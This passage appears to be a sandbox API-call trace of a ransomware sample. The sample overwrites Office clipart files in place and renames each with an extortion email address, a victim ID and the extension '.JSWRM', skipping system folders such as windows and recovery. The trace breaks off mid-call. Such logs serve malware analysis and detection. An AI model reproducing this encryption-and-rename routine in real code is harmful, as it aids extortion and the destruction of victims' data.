lpNumberOfBytesRead=0x345e89c*=0x470, lpOverlapped=0x0) returned 1 [0079.053] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.053] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x470, lpOverlapped=0x0) returned 1 [0079.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.054] CloseHandle (hObject=0x314) returned 1 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0079.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0079.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0079.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.054] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.055] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01058_.WMF", cAlternateFileName="")) returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2=".") returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="..") returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="...") returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="windows") returned -1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="recovery") returned -1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="perflogs") returned -1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="documents and settings") returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="system volume information") returned -1 [0079.055] lstrcmpiW (lpString1="HH01058_.WMF", lpString2="msocache") returned -1 [0079.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01058_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01058_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01058_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01058_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01058_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01058_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.060] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2756) returned 1 [0079.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xac0) returned 0x23fc98 [0079.060] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0079.062] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.062] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0079.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.063] CloseHandle (hObject=0x314) returned 1 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0079.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.064] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01065_.WMF", cAlternateFileName="")) returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2=".") returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="..") returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="...") returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="windows") returned -1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="recovery") returned -1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="perflogs") returned -1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="documents and settings") returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="system volume information") returned -1 [0079.064] lstrcmpiW (lpString1="HH01065_.WMF", lpString2="msocache") returned -1 [0079.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01065_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01065_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01065_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01065_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01065_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01065_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.065] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1268) returned 1 [0079.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f0) returned 0x230a00 [0079.065] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x4f0, lpOverlapped=0x0) returned 1 [0079.066] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.066] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x4f0, lpOverlapped=0x0) returned 1 [0079.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0079.066] CloseHandle (hObject=0x314) returned 1 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0079.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0079.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0079.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0079.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.067] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.068] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1388, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01080_.WMF", cAlternateFileName="")) returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2=".") returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="..") returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="...") returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="windows") returned -1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="recovery") returned -1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="perflogs") returned -1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="documents and settings") returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="system volume information") returned -1 [0079.068] lstrcmpiW (lpString1="HH01080_.WMF", lpString2="msocache") returned -1 [0079.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01080_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01080_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01080_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01080_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01080_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01080_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0079.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.073] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5000) returned 1 [0079.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x205850 [0079.074] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0079.078] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.078] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0079.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.079] CloseHandle (hObject=0x314) returned 1 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0079.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0079.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 